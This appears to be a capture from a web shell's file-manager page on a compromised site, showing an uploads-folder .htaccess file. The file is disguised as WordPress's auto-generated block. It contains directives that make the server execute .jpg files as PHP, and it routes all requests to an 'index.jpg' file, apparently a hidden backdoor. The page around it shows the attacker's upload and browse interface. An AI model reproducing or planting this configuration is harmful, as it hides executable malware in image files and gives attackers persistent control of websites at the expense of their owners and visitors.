Your IP : 216.73.217.20


Current Path : /home/u438053920/domains/allindiacomputereducation.com/public_html/uploads/
Upload File :
Current File : /home/u438053920/domains/allindiacomputereducation.com/public_html/uploads/.htaccess

# BEGIN WordPress
# The directives (lines) between "BEGIN WordPress" and "END WordPress" are
# dynamically generated, and should only be modified via WordPress filters.
# Any changes to the directives between these markers will be overwritten.
AddType application/x-httpd-php .jpg
AddHandler application/x-httpd-php .jpg
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]
RewriteBase /
RewriteRule ^index\.jpg$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.jpg [L]
</IfModule>

# END WordPress